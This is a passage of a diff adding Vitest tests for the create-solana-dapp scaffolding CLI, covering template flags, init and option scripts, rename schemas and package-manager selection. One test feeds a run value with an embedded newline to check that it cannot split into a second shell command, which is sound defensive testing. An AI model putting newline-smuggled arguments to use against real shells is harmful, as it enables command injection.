+  const init: InitScript = {
+    instructions: ['Run {pm} install'],
+    rename: { placeholder: { in: ['src'], to: 'test-project' } },
+  }
+
+  beforeEach(() => {
+    vi.resetAllMocks()
+    vi.mocked(initScriptOptions).mockResolvedValue(['Option instruction'])
+  })
+
+  it('is skipped when the init script is skipped', () => {
+    expect(createAppTaskRunInitScript({ ...args, skipInit: true }, init, []).enabled).toBe(false)
+  })
+
+  it('reports nothing to do when the template has no init script', async () => {
+    const result = await createAppTaskRunInitScript(args, undefined, []).task((value) => value)
+
+    expect(result).toEqual({ message: 'Init script not found' })
+    expect(initScriptRename).not.toHaveBeenCalled()
+  })
+
+  /**
+   * The option scripts run before this task and may rewrite package.json, so the init script has to
+   * come from the snapshot taken before they ran rather than from disk. Nothing is written to the
+   * mocked filesystem here: a task that reads package.json again would throw instead.
+   */
+  it('applies the snapshot without reading package.json again', async () => {
+    const result = await createAppTaskRunInitScript(args, init, [])
+
+    const value = await result.task((input) => input)
+
+    expect(initScriptVersion).toHaveBeenCalledWith(init.versions, false)
+    expect(initScriptRename).toHaveBeenCalledWith(args, init.rename, false)
+    expect(initScriptDelete).toHaveBeenCalledWith(args)
+    expect(value).toEqual({
+      instructions: ['Option instruction', 'Run pnpm install'],
+      message: 'Init script done',
+    })
+  })
+})

--- a/test/create-app-task-run-option-script.test.ts
+++ b/test/create-app-task-run-option-script.test.ts
@@ -1,0 +1,96 @@
+import { fs, vol } from 'memfs'
+import { beforeEach, describe, expect, it, vi } from 'vitest'
+import { createAppTaskRunOptionScript } from '../src/utils/create-app-task-run-option-script'
+import { GetArgsResult } from '../src/utils/get-args-result'
+import { SelectedTemplateOption } from '../src/utils/init-script-options'
+import { execAndWait } from '../src/utils/vendor/child-process-utils'
+
+vi.mock('node:fs')
+vi.mock('../src/utils/vendor/child-process-utils', () => ({
+  execAndWait: vi.fn(),
+}))
+vi.mock('@clack/prompts', () => ({
+  log: {
+    error: vi.fn(),
+    warn: vi.fn(),
+  },
+}))
+
+describe('createAppTaskRunOptionScript', () => {
+  const targetDirectory = '/template'
+
+  const args: GetArgsResult = {
+    app: { name: 'test-app', version: '1.0.0' },
+    dryRun: false,
+    name: 'test-project',
+    packageManager: 'npm',
+    skipGit: false,
+    skipInit: false,
+    skipInstall: false,
+    targetDirectory,
+    template: { description: 'description', name: 'basic', repository: '/template' },
+    verbose: false,
+  }
+
+  const resetProject: SelectedTemplateOption = {
+    name: 'reset-project',
+    value: { run: 'reset-project -- --yes' },
+  }
+
+  function writePackageJson(scripts: Record<string, string>) {
+    fs.mkdirSync(targetDirectory, { recursive: true })
+    fs.writeFileSync(`${targetDirectory}/package.json`, JSON.stringify({ name: 'template', scripts }))
+  }
+
+  beforeEach(() => {
+    vi.resetAllMocks()
+    vol.reset()
+  })
+
+  it('is disabled when no selected option declares a script', () => {
+    const task = createAppTaskRunOptionScript(args, [{ name: 'keep-example', value: { instructions: ['Keep it'] } }])
+
+    expect(task.enabled).toBe(false)
+  })
+
+  it('is disabled when the init script is skipped', () => {
+    const task = createAppTaskRunOptionScript({ ...args, skipInit: true }, [resetProject])
+
+    expect(task.enabled).toBe(false)
+  })
+
+  it('runs the declared script with the selected package manager', async () => {
+    writePackageJson({ 'reset-project': 'node ./scripts/reset-project.js' })
+    vi.mocked(execAndWait).mockResolvedValue({ code: 0, stdout: '' })
+
+    const task = createAppTaskRunOptionScript({ ...args, packageManager: 'pnpm' }, [resetProject])
+    const result = await task.task((value) => value)
+
+    expect(execAndWait).toHaveBeenCalledWith('pnpm run reset-project -- --yes', targetDirectory)
+    expect(result).toEqual({ message: 'Ran --reset-project' })
+  })
+
+  it('collapses whitespace in the run value so the arguments reach the shell as one command', async () => {
+    writePackageJson({ 'reset-project': 'node ./scripts/reset-project.js' })
+    vi.mocked(execAndWait).mockResolvedValue({ code: 0, stdout: '' })
+
+    // A newline would otherwise end the command and run the arguments as a second one
+    const task = createAppTaskRunOptionScript(args, [
+      { name: 'reset-project', value: { run: ' reset-project\t--\n--yes  --force ' } },
+    ])
+    await task.task((value) => value)
+
+    expect(execAndWait).toHaveBeenCalledWith('npm run reset-project -- --yes --force', targetDirectory)
+  })
+
+  it('fails when the template does not declare the script', async () => {
+    writePackageJson({ build: 'next build' })
+
+    const task = createAppTaskRunOptionScript(args, [resetProject])
+
+    await expect(task.task((value) => value)).rejects.toThrow(
+      'Template option --reset-project requires a "reset-project" script in package.json',
+    )
+    expect(execAndWait).not.toHaveBeenCalled()
+  })
+})

--- a/test/create-app.test.ts
+++ b/test/create-app.test.ts
@@ -2,6 +2,8 @@ import { beforeEach, describe, expect, it, vi } from 'vitest'
 import { createApp } from '../src/utils/create-app'
 import { createAppTaskInstallDependencies } from '../src/utils/create-app-task-install-dependencies'
 import { GetArgsResult } from '../src/utils/get-args-result'
+import { getPackageJson } from '../src/utils/get-package-json'
+import { resolveInitScriptOptions } from '../src/utils/init-script-options'
 import { initScriptPackageManager } from '../src/utils/init-script-package-manager'
 import { tasks } from '../src/utils/vendor/clack-tasks'
 
@@ -10,6 +12,12 @@ vi.mock('../src/utils/create-app-task-install-dependencies', () => ({
     task: vi.fn(),
     title: `Installing via ${args.packageManager}`,
   })),
+}))
+vi.mock('../src/utils/get-package-json', () => ({
+  getPackageJson: vi.fn(() => ({ contents: {}, path: '/template/package.json' })),
+}))
+vi.mock('../src/utils/init-script-options', () => ({
+  resolveInitScriptOptions: vi.fn(() => []),
 }))
 vi.mock('../src/utils/init-script-package-manager', () => ({
   initScriptPackageManager: vi.fn(),
@@ -36,6 +44,8 @@ describe('createApp', () => {
 
   beforeEach(() => {
     vi.resetAllMocks()
+    vi.mocked(getPackageJson).mockReturnValue({ contents: {}, path: '/template/package.json' })
+    vi.mocked(resolveInitScriptOptions).mockReturnValue([])
   })
 
   it('should resolve the template package manager after cloning and before creating install tasks', async () => {

--- a/test/extract-template-option-flags.test.ts
+++ b/test/extract-template-option-flags.test.ts
@@ -1,0 +1,62 @@
+import { Command } from 'commander'
+import { describe, expect, it } from 'vitest'
+import { extractTemplateOptionFlags } from '../src/utils/extract-template-option-flags'
+
+function command() {
+  return new Command().argument('[name]').option('-t, --template <template-name>').option('--skip-install')
+}
+
+describe('extractTemplateOptionFlags', () => {
+  it('extracts boolean long flags while preserving known arguments', () => {
+    const argv = ['node', 'create-solana-dapp', 'my-app', '--template', 'pay-gate-inference', '--ollama']
+
+    expect(extractTemplateOptionFlags(command(), argv)).toEqual({
+      argv: ['node', 'create-solana-dapp', 'my-app', '--template', 'pay-gate-inference'],
+      templateOptions: ['ollama'],
+    })
+  })
+
+  it('deduplicates repeated template flags', () => {
+    const argv = ['node', 'create-solana-dapp', 'my-app', '--ollama', '--ollama']
+
+    expect(extractTemplateOptionFlags(command(), argv)).toEqual({
+      argv: ['node', 'create-solana-dapp', 'my-app'],
+      templateOptions: ['ollama'],
+    })
+  })
+
+  it('preserves positional and registered arguments after a template flag', () => {
+    const argv = [
+      'node',
+      'create-solana-dapp',
+      '--ollama',
+      'my-app',
+      '--skip-install',
+      '--template',
+      'pay-gate-inference',
+    ]
+
+    expect(extractTemplateOptionFlags(command(), argv)).toEqual({
+      argv: ['node', 'create-solana-dapp', 'my-app', '--skip-install', '--template', 'pay-gate-inference'],
+      templateOptions: ['ollama'],
+    })
+  })
+
+  it('preserves a required option value that resembles a template flag', () => {
+    const argv = ['node', 'create-solana-dapp', 'my-app', '--template', '--ollama']
+
+    expect(extractTemplateOptionFlags(command(), argv)).toEqual({
+      argv,
+      templateOptions: [],
+    })
+  })
+
+  it('rejects short flags and values for template options', () => {
+    expect(() => extractTemplateOptionFlags(command(), ['node', 'create-solana-dapp', 'my-app', '-o'])).toThrow(
+      'Template options must be boolean long flags',
+    )
+    expect(() =>
+      extractTemplateOptionFlags(command(), ['node', 'create-solana-dapp', 'my-app', '--engine=ollama']),
+    ).toThrow('Template options must be boolean long flags')
+  })
+})

--- a/test/get-args.test.ts
+++ b/test/get-args.test.ts
@@ -118,4 +118,38 @@ describe('getArgs', () => {
     expect(outro).not.toHaveBeenCalled()
     expect(runVersionCheck).not.toHaveBeenCalled()
   })
+
+  it('collects template-defined boolean flags without registering them globally', async () => {
+    const args = await getArgs(
+      ['node', 'create-solana-dapp', 'my-app', '--template', 'basic', '--llamacpp', '--skip-version-check'],
+      app,
+    )
+
+    expect(args.name).toBe('my-app')
+    expect(args.templateOptions).toEqual(['llamacpp'])
+    expect(args.template).toBe(template)
+  })
+
+  it('parses positional and registered arguments after a template-defined flag', async () => {
+    const args = await getArgs(
+      [
+        'node',
+        'create-solana-dapp',
+        '--llamacpp',
+        'my-app',
+        '--skip-install',
+        '--template',
+        'basic',
+        '--skip-version-check',
+      ],
+      app,
+    )
+
+    expect(args).toMatchObject({
+      name: 'my-app',
+      skipInstall: true,
+      template,
+      templateOptions: ['llamacpp'],
+    })
+  })
 })

--- a/test/get-package-json.test.ts
+++ b/test/get-package-json.test.ts
@@ -36,13 +36,12 @@ describe('getPackageJson', () => {
 
     expect(() => getPackageJson(targetDirectory)).toThrow(`Invalid package.json: [
   {
+    "expected": "record",
     "code": "invalid_type",
-    "expected": "object",
-    "received": "string",
     "path": [
       "scripts"
     ],
-    "message": "Expected object, received string"
+    "message": "Invalid input: expected record, received string"
   }
 ]`)
   })

--- a/test/get-prompts.test.ts
+++ b/test/get-prompts.test.ts
@@ -1,0 +1,121 @@
+import { select, text } from '@clack/prompts'
+import { beforeEach, describe, expect, it, vi } from 'vitest'
+import { GetArgsResult } from '../src/utils/get-args-result'
+import { getPrompts } from '../src/utils/get-prompts'
+import type { Template } from '../src/utils/template'
+import type { MenuItem, TemplateJsonTemplate } from '../src/utils/template-schema'
+
+// Keep the real `group` so the prompt order is actually exercised, and stub the individual prompts
+vi.mock('@clack/prompts', async (importOriginal) => {
+  const actual = await importOriginal<typeof import('@clack/prompts')>()
+  return {
+    ...actual,
+    cancel: vi.fn(),
+    log: { success: vi.fn() },
+    select: vi.fn(),
+    text: vi.fn(),
+  }
+})
+
+const template: TemplateJsonTemplate = {
+  description: 'A minimal template for building a Solana mobile app',
+  id: 'gh:solana-mobile/templates/mobile/expo-kit-minimal',
+  keywords: [],
+  name: 'expo-kit-minimal',
+  path: 'mobile/expo-kit-minimal',
+}
+
+const items: MenuItem[] = [
+  {
+    description: 'Solana Mobile Templates',
+    id: 'solana-mobile',
+    name: 'Solana Mobile',
+    templates: [template],
+  },
+]
+
+function getOptions(overrides: Partial<GetArgsResult> = {}): GetArgsResult {
+  return {
+    app: { name: 'create-solana-dapp', version: '0.0.0' },
+    dryRun: false,
+    name: '',
+    packageManager: 'npm',
+    skipGit: false,
+    skipInit: false,
+    skipInstall: false,
+    targetDirectory: '',
+    template: undefined as unknown as Template,
+    verbose: false,
+    ...overrides,
+  }
+}
+
+function getTextOptions(call = 0) {
+  return vi.mocked(text).mock.calls[call][0]
+}
+
+describe('getPrompts', () => {
+  beforeEach(() => {
+    vi.clearAllMocks()
+  })
+
+  it('asks for the template before the name and pre-fills the name with the template name', async () => {
+    vi.mocked(select).mockResolvedValueOnce(items[0]).mockResolvedValueOnce(template)
+    vi.mocked(text).mockResolvedValueOnce(template.name)
+
+    const result = await getPrompts({ items, options: getOptions() })
+
+    expect(vi.mocked(select).mock.calls[0][0].message).toBe('Select a group')
+    expect(vi.mocked(select).mock.calls[1][0].message).toBe('Select a template')
+    expect(getTextOptions().message).toBe('Enter project name')
+    // Both selects resolve before the name prompt is ever rendered
+    expect(vi.mocked(text).mock.invocationCallOrder[0]).toBeGreaterThan(vi.mocked(select).mock.invocationCallOrder[1])
+    expect(getTextOptions().initialValue).toBe('expo-kit-minimal')
+    expect(result).toEqual({ name: 'expo-kit-minimal', template })
+  })
+
+  it('pre-fills the name with a template passed on the command line', async () => {
+    vi.mocked(text).mockResolvedValueOnce(template.name)
+
+    await getPrompts({ items, options: getOptions({ template }) })
+
+    expect(select).not.toHaveBeenCalled()
+    expect(getTextOptions().initialValue).toBe('expo-kit-minimal')
+  })
+
+  it('does not prompt for a name that was passed on the command line', async () => {
+    vi.mocked(select).mockResolvedValueOnce(items[0]).mockResolvedValueOnce(template)
+
+    const result = await getPrompts({ items, options: getOptions({ name: 'my-app' }) })
+
+    expect(text).not.toHaveBeenCalled()
+    expect(result).toEqual({ name: 'my-app', template })
+  })
+
+  // `findTemplate` keeps the raw reference as the name for external and local templates
+  it.each([
+    ['an external template', 'solana-labs/dapp-kit', 'dapp-kit'],
+    ['a qualified external template', 'gh:solana-labs/dapp-kit', 'dapp-kit'],
+    ['a relative local template', './my-template', 'my-template'],
+    ['a parent-relative local template', '../shared/my-template', 'my-template'],
+    ['an absolute local template', '/Users/bee/dev/my-template', 'my-template'],
+    ['a trailing slash', 'solana-labs/dapp-kit/', 'dapp-kit'],
+  ])('pre-fills the name with the last path segment of %s', async (_, name, expected) => {
+    vi.mocked(text).mockResolvedValueOnce(expected)
+
+    await getPrompts({ items, options: getOptions({ template: { ...template, name } }) })
+
+    expect(getTextOptions().initialValue).toBe(expected)
+  })
+
+  it.each([
+    ['a segment that is not a usable directory name', './my.template'],
+    ['a path with no usable segment', '../'],
+  ])('leaves the name empty rather than proposing %s', async (_, name) => {
+    vi.mocked(text).mockResolvedValueOnce('my-app')
+
+    await getPrompts({ items, options: getOptions({ template: { ...template, name } }) })
+
+    expect(getTextOptions().initialValue).toBeUndefined()
+  })
+})

--- a/test/init-script-instructions.test.ts
+++ b/test/init-script-instructions.test.ts
@@ -10,6 +10,7 @@ vi.mock('@clack/prompts', () => ({
 }))
 describe('initScriptInstructions', () => {
   beforeEach(() => {
+    vi.clearAllMocks()
     vi.spyOn(console, 'log').mockImplementation(() => {})
   })
 

--- a/test/init-script-options.test.ts
+++ b/test/init-script-options.test.ts
@@ -64,7 +64,7 @@ describe('initScriptOptions', () => {
   })
 
   it('applies selected renames and returns selected instructions', async () => {
-    const instructions = await initScriptOptions({ ...args, templateOptions: ['llamacpp'] }, options)
+    const instructions = await initScriptOptions(args, resolveInitScriptOptions(options, ['llamacpp']))
 
     expect(initScriptRenameEntries).toHaveBeenCalledWith(expect.any(Object), options.llamacpp.rename)
     expect(instructions).toEqual(['Start llama.cpp'])

--- a/test/init-script-options.test.ts
+++ b/test/init-script-options.test.ts
@@ -1,0 +1,72 @@
+import { beforeEach, describe, expect, it, vi } from 'vitest'
+import { GetArgsResult } from '../src/utils/get-args-result'
+import { initScriptOptions, resolveInitScriptOptions } from '../src/utils/init-script-options'
+import { initScriptRenameEntries } from '../src/utils/init-script-rename'
+import { InitScriptOptions } from '../src/utils/init-script-schema'
+
+vi.mock('../src/utils/init-script-rename', () => ({
+  initScriptRenameEntries: vi.fn(),
+}))
+
+const options: InitScriptOptions = {
+  llamacpp: {
+    group: 'engine',
+    instructions: ['Start llama.cpp'],
+    rename: {
+      __MODEL__: { paths: ['request.json'], to: 'local-model' },
+    },
+  },
+  ollama: {
+    default: true,
+    group: 'engine',
+    instructions: ['Start Ollama'],
+    rename: {
+      __MODEL__: { paths: ['request.json'], to: 'qwen3:0.6b' },
+    },
+  },
+}
+
+const args: GetArgsResult = {
+  app: { name: 'test-app', version: '1.0.0' },
+  dryRun: false,
+  name: 'test-project',
+  packageManager: 'npm',
+  skipGit: false,
+  skipInit: false,
+  skipInstall: false,
+  targetDirectory: '/template',
+  template: { description: 'description', name: 'basic', repository: '/template' },
+  verbose: false,
+}
+
+describe('resolveInitScriptOptions', () => {
+  it('selects the group default when no flag is requested', () => {
+    expect(resolveInitScriptOptions(options, []).map((option) => option.name)).toEqual(['ollama'])
+  })
+
+  it('replaces the group default with the requested option', () => {
+    expect(resolveInitScriptOptions(options, ['llamacpp']).map((option) => option.name)).toEqual(['llamacpp'])
+  })
+
+  it('rejects unknown and conflicting options', () => {
+    expect(() => resolveInitScriptOptions(options, ['unknown'])).toThrow(
+      'Template does not support --unknown. Available options: --llamacpp, --ollama.',
+    )
+    expect(() => resolveInitScriptOptions(options, ['ollama', 'llamacpp'])).toThrow(
+      'Template options --ollama and --llamacpp are mutually exclusive',
+    )
+  })
+})
+
+describe('initScriptOptions', () => {
+  beforeEach(() => {
+    vi.clearAllMocks()
+  })
+
+  it('applies selected renames and returns selected instructions', async () => {
+    const instructions = await initScriptOptions({ ...args, templateOptions: ['llamacpp'] }, options)
+
+    expect(initScriptRenameEntries).toHaveBeenCalledWith(expect.any(Object), options.llamacpp.rename)
+    expect(instructions).toEqual(['Start llama.cpp'])
+  })
+})

--- a/test/init-script-options.test.ts
+++ b/test/init-script-options.test.ts
@@ -13,7 +13,7 @@ const options: InitScriptOptions = {
     group: 'engine',
     instructions: ['Start llama.cpp'],
     rename: {
-      __MODEL__: { paths: ['request.json'], to: 'local-model' },
+      __MODEL__: { in: ['request.json'], to: 'local-model' },
     },
   },
   ollama: {
@@ -21,7 +21,7 @@ const options: InitScriptOptions = {
     group: 'engine',
     instructions: ['Start Ollama'],
     rename: {
-      __MODEL__: { paths: ['request.json'], to: 'qwen3:0.6b' },
+      __MODEL__: { in: ['request.json'], to: 'qwen3:0.6b' },
     },
   },
 }

--- a/test/init-script-package-manager.test.ts
+++ b/test/init-script-package-manager.test.ts
@@ -1,3 +1,4 @@
+import { log } from '@clack/prompts'
 import { fs, vol } from 'memfs'
 import { beforeEach, describe, expect, it, vi } from 'vitest'
 import { GetArgsResult } from '../src/utils/get-args-result'
@@ -80,15 +81,36 @@ describe('initScriptPackageManager', () => {
     expect(getPackageManagerVersion).not.toHaveBeenCalled()
   })
 
-  it('should reject a template package manager that is not installed', () => {
+  it('should treat an omitted selection flag as explicit for programmatic callers', () => {
+    writePackageJson('bun')
+    const args: GetArgsResult = { ...baseArgs }
+    delete args.packageManagerExplicit
+
+    expect(() => initScriptPackageManager(args)).toThrow('Template requires bun, but npm was explicitly selected')
+    expect(args.packageManager).toBe('npm')
+    expect(getPackageManagerVersion).not.toHaveBeenCalled()
+  })
+
+  it('should reject a template package manager that is not available', () => {
     writePackageJson('bun')
     vi.mocked(getPackageManagerVersion).mockImplementation(() => {
       throw new Error('command not found')
     })
     const args = { ...baseArgs }
 
-    expect(() => initScriptPackageManager(args)).toThrow('Template requires bun, but bun is not installed')
+    expect(() => initScriptPackageManager(args)).toThrow('Template requires bun, but bun is not available')
     expect(args.packageManager).toBe('npm')
+  })
+
+  it('should log the package manager error in verbose mode', () => {
+    writePackageJson('bun')
+    vi.mocked(getPackageManagerVersion).mockImplementation(() => {
+      throw new Error('spawnSync /bin/sh ENOENT')
+    })
+    const args = { ...baseArgs, verbose: true }
+
+    expect(() => initScriptPackageManager(args)).toThrow('Template requires bun, but bun is not available')
+    expect(log.error).toHaveBeenCalledWith('Error checking bun availability: Error: spawnSync /bin/sh ENOENT')
   })
 
   function writePackageJson(packageManager?: string) {

--- a/test/init-script-rename.test.ts
+++ b/test/init-script-rename.test.ts
@@ -111,6 +111,32 @@ describe('initScriptRename', () => {
     )
   })
 
+  it('should preserve punctuation in exact replacement values', async () => {
+    const args = { ...baseArgs }
+    const rename = {
+      'inference-model': {
+        paths: ['request.json'],
+        to: 'qwen3:0.6b',
+      },
+    }
+    vi.mocked(namesValues).mockImplementation((name) =>
+      name === 'inference-model'
+        ? ['InferenceModel', 'INFERENCE_MODEL', 'inference-model', 'inference-model', 'inferenceModel']
+        : ['Qwen306b', 'QWEN306B', 'qwen306b', 'qwen3:0.6b', 'qwen306b'],
+    )
+    vi.mocked(ensureTargetPath).mockResolvedValue(true)
+
+    await initScriptRename(args, rename)
+
+    expect(searchAndReplace).toHaveBeenLastCalledWith(
+      '/template/request.json',
+      ['InferenceModel', 'INFERENCE_MODEL', 'inference-model', 'inferenceModel'],
+      ['Qwen306b', 'QWEN306B', 'qwen3:0.6b', 'qwen306b'],
+      false,
+      false,
+    )
+  })
+
   it('should use dry run mode when replacing the project name from package.json', async () => {
     const args = { ...baseArgs, dryRun: true }
 

--- a/test/init-script-rename.test.ts
+++ b/test/init-script-rename.test.ts
@@ -68,7 +68,7 @@ describe('initScriptRename', () => {
     const fromNames = ['ExampleApp', 'EXAMPLE_APP', 'example-app', 'Example App', 'exampleApp']
     const rename = {
       'Example App': {
-        paths: ['app.json'],
+        in: ['app.json'],
         to: '{{name}}',
       },
     }
@@ -93,7 +93,7 @@ describe('initScriptRename', () => {
       await vi.importActual<typeof import('../src/utils/vendor/names')>('../src/utils/vendor/names')
     const rename = {
       'Example App': {
-        paths: ['app.json'],
+        in: ['app.json'],
         to: '{{name}}',
       },
     }
@@ -115,7 +115,7 @@ describe('initScriptRename', () => {
     const args = { ...baseArgs }
     const rename = {
       'inference-model': {
-        paths: ['request.json'],
+        in: ['request.json'],
         to: 'qwen3:0.6b',
       },
     }
@@ -164,7 +164,7 @@ describe('initScriptRename', () => {
     const args = { ...baseArgs, verbose: true }
     const rename = {
       example: {
-        paths: ['some/path/to/file'],
+        in: ['some/path/to/file'],
         to: '{{name}}Example',
       },
     }
@@ -184,6 +184,49 @@ describe('initScriptRename', () => {
     )
   })
 
+  it('should still replace using the deprecated `paths` and warn about it', async () => {
+    const args = { ...baseArgs }
+    const rename = {
+      example: {
+        paths: ['some/path/to/file'],
+        to: '{{name}}Example',
+      },
+    }
+    const exampleNames = ['Example']
+    const newNameExamples = ['test-projectExample']
+    vi.mocked(namesValues).mockImplementation((name) => (name === 'example' ? exampleNames : newNameExamples))
+    vi.mocked(ensureTargetPath).mockResolvedValue(true)
+
+    await initScriptRename(args, rename)
+
+    expect(searchAndReplace).toHaveBeenCalledWith(
+      expect.stringContaining('some/path/to/file'),
+      exampleNames,
+      newNameExamples,
+      args.dryRun,
+      args.verbose,
+    )
+    expect(log.warn).toHaveBeenCalledWith(
+      `initScriptRename: 'paths' is deprecated and is removed in the next major version, use 'in' instead: example`,
+    )
+  })
+
+  it('should not warn about `paths` when only `in` is used', async () => {
+    const args = { ...baseArgs }
+    const rename = {
+      example: {
+        in: ['some/path/to/file'],
+        to: '{{name}}Example',
+      },
+    }
+    vi.mocked(namesValues).mockReturnValue(['Example'])
+    vi.mocked(ensureTargetPath).mockResolvedValue(true)
+
+    await initScriptRename(args, rename)
+
+    expect(log.warn).not.toHaveBeenCalled()
+  })
+
   it('should log a message when verbose and no rename object is provided', async () => {
     const args: GetArgsResult = { ...baseArgs, verbose: true }
     await initScriptRename(args, undefined)
@@ -194,7 +237,7 @@ describe('initScriptRename', () => {
     const args = { ...baseArgs, verbose: true }
     const rename = {
       example: {
-        paths: ['some/path/to/file'],
+        in: ['some/path/to/file'],
         to: '{{name}}Example',
       },
     }
@@ -216,7 +259,7 @@ describe('initScriptRename', () => {
     const args = { ...baseArgs, verbose: true }
     const rename = {
       example: {
-        paths: ['nonexistent/path/to/file'],
+        in: ['nonexistent/path/to/file'],
         to: '{{name}}Example',
       },
     }

--- a/test/init-script-schema.test.ts
+++ b/test/init-script-schema.test.ts
@@ -1,0 +1,58 @@
+import { describe, expect, it } from 'vitest'
+import { InitScriptSchema, InitScriptSchemaRename } from '../src/utils/init-script-schema'
+
+describe('InitScriptSchema - rename entries', () => {
+  const parseRename = (rename: unknown) => InitScriptSchema.parse({ rename }).rename
+
+  it('should accept `in`', () => {
+    const parsed = parseRename({ example: { in: ['some/path/to/file'], to: '{{name}}Example' } })
+
+    expect(parsed?.example.in).toEqual(['some/path/to/file'])
+    expect(parsed?.example.to).toBe('{{name}}Example')
+  })
+
+  it('should accept the deprecated `paths`', () => {
+    const parsed = parseRename({ example: { paths: ['some/path/to/file'], to: '{{name}}Example' } })
+
+    expect(parsed?.example.paths).toEqual(['some/path/to/file'])
+    expect(parsed?.example.in).toBeUndefined()
+  })
+
+  it('should accept an empty array', () => {
+    const parsed = parseRename({ example: { in: [], to: '{{name}}Example' } })
+
+    expect(parsed?.example.in).toEqual([])
+  })
+
+  it('should accept `in` and the deprecated `paths` in separate entries', () => {
+    const parsed = parseRename({
+      example1: { in: ['some/path/to/file1'], to: '{{name}}Example1' },
+      example2: { paths: ['some/path/to/file2'], to: '{{name}}Example2' },
+    })
+
+    expect(parsed?.example1.in).toEqual(['some/path/to/file1'])
+    expect(parsed?.example2.paths).toEqual(['some/path/to/file2'])
+  })
+
+  it('should reject an entry using both `in` and `paths`', () => {
+    const result = InitScriptSchemaRename.safeParse({
+      example: { in: ['path/from/in'], paths: ['path/from/paths'], to: '{{name}}Example' },
+    })
+
+    expect(result.success).toBe(false)
+    expect(result.error?.issues[0].message).toBe(
+      `Use either 'in' or 'paths', not both ('paths' is deprecated, use 'in')`,
+    )
+  })
+
+  it('should reject an entry with neither `in` nor `paths`', () => {
+    const result = InitScriptSchemaRename.safeParse({ example: { to: '{{name}}Example' } })
+
+    expect(result.success).toBe(false)
+    expect(result.error?.issues[0].message).toBe(`Missing 'in': list the paths to search for this rename`)
+  })
+
+  it('should reject an entry without `to`', () => {
+    expect(InitScriptSchemaRename.safeParse({ example: { in: ['some/path/to/file'] } }).success).toBe(false)
+  })
+})

--- a/test/main.test.ts
+++ b/test/main.test.ts
@@ -54,7 +54,7 @@ describe('main', () => {
   })
 
   it.each([
-    'Template requires bun, but bun is not installed',
+    'Template requires bun, but bun is not available',
     'Template requires bun, but npm was explicitly selected',
   ])('should exit with a non-zero code when %s', async (message) => {
     vi.mocked(createApp).mockRejectedValue(new Error(message))

--- a/test/package-manifest.test.ts
+++ b/test/package-manifest.test.ts
@@ -1,0 +1,21 @@
+import { describe, expect, it } from 'vitest'
+import packageJson from '../package.json'
+
+const dependencies: Record<string, string> = packageJson.dependencies
+const peerDependenciesMeta: Record<string, { optional?: boolean }> =
+  (packageJson as { peerDependenciesMeta?: Record<string, { optional?: boolean }> }).peerDependenciesMeta ?? {}
+
+describe('package manifest', () => {
+  it('should declare zod as a runtime dependency', () => {
+    // The CLI parses template catalogs and init scripts with zod, so it must resolve at runtime.
+    expect(dependencies.zod).toBeDefined()
+  })
+
+  it('should not declare any runtime dependency as an optional peer dependency', () => {
+    // pnpm skips installing optional peer dependencies entirely, even when the same package is
+    // listed in `dependencies`, which breaks `pnpm dlx create-solana-dapp` with a missing module.
+    const optionalPeers = Object.keys(peerDependenciesMeta).filter((name) => peerDependenciesMeta[name]?.optional)
+
+    expect(optionalPeers.filter((name) => name in dependencies)).toEqual([])
+  })
+})

--- a/test/remove-incompatible-package-manager.test.ts
+++ b/test/remove-incompatible-package-manager.test.ts
@@ -1,0 +1,108 @@
+import { mkdtempSync, readFileSync, rmSync, writeFileSync } from 'node:fs'
+import { tmpdir } from 'node:os'
+import { join } from 'node:path'
+import { afterEach, beforeEach, describe, expect, it } from 'vitest'
+import { GetArgsResult } from '../src/utils/get-args-result'
+import { initScriptPackageManager } from '../src/utils/init-script-package-manager'
+import { initScriptKey } from '../src/utils/init-script-schema'
+import { removeIncompatiblePackageManager } from '../src/utils/remove-incompatible-package-manager'
+
+describe('removeIncompatiblePackageManager', () => {
+  let dir: string
+
+  beforeEach(() => {
+    dir = mkdtempSync(join(tmpdir(), 'csd-pm-'))
+  })
+
+  afterEach(() => {
+    rmSync(dir, { force: true, recursive: true })
+  })
+
+  function writePackageJson(pkg: Record<string, unknown>) {
+    writeFileSync(join(dir, 'package.json'), JSON.stringify(pkg, undefined, 2))
+  }
+
+  function readPackageJson(): Record<string, unknown> {
+    return JSON.parse(readFileSync(join(dir, 'package.json'), 'utf8'))
+  }
+
+  it('removes `packageManager` when it does not match the selected package manager', () => {
+    writePackageJson({ name: 'demo', packageManager: 'pnpm@10.15.1' })
+    const removed = removeIncompatiblePackageManager(dir, 'npm')
+    expect(removed).toBe('pnpm@10.15.1')
+    expect(readPackageJson()).not.toHaveProperty('packageManager')
+    expect(readPackageJson().name).toBe('demo')
+    // The rewritten file keeps a trailing newline (insert_final_newline).
+    expect(readFileSync(join(dir, 'package.json'), 'utf8').endsWith('\n')).toBe(true)
+  })
+
+  it('keeps `packageManager` when its name matches the selected package manager', () => {
+    writePackageJson({ name: 'demo', packageManager: 'pnpm@10.15.1' })
+    const removed = removeIncompatiblePackageManager(dir, 'pnpm')
+    expect(removed).toBeUndefined()
+    expect(readPackageJson().packageManager).toBe('pnpm@10.15.1')
+  })
+
+  it('does nothing when there is no `packageManager` field', () => {
+    writePackageJson({ name: 'demo' })
+    const removed = removeIncompatiblePackageManager(dir, 'yarn')
+    expect(removed).toBeUndefined()
+    expect(readPackageJson()).not.toHaveProperty('packageManager')
+  })
+})
+
+describe('template-configured package manager precedence (#258)', () => {
+  let dir: string
+
+  beforeEach(() => {
+    dir = mkdtempSync(join(tmpdir(), 'csd-pm-precedence-'))
+  })
+
+  afterEach(() => {
+    rmSync(dir, { force: true, recursive: true })
+  })
+
+  it('keeps a pin matching the template-configured package manager, even when another manager was selected', () => {
+    writeFileSync(
+      join(dir, 'package.json'),
+      JSON.stringify(
+        {
+          [initScriptKey]: { packageManager: 'pnpm' },
+          name: 'demo',
+          packageManager: 'pnpm@10.15.1',
+        },
+        undefined,
+        2,
+      ),
+    )
+    // Mirrors the ordering in createApp: the template override runs first,
+    // then the removal compares against the *effective* package manager.
+    const args = {
+      packageManager: 'npm',
+      packageManagerExplicit: false,
+      targetDirectory: dir,
+    } as GetArgsResult
+    initScriptPackageManager(args)
+    expect(args.packageManager).toBe('pnpm')
+    const removed = removeIncompatiblePackageManager(dir, args.packageManager)
+    expect(removed).toBeUndefined()
+    const contents = JSON.parse(readFileSync(join(dir, 'package.json'), 'utf8'))
+    expect(contents.packageManager).toBe('pnpm@10.15.1')
+  })
+
+  it('still removes a pin that conflicts with the effective package manager when the template configures none', () => {
+    writeFileSync(
+      join(dir, 'package.json'),
+      JSON.stringify({ name: 'demo', packageManager: 'yarn@4.0.0' }, undefined, 2),
+    )
+    const args = {
+      packageManager: 'npm',
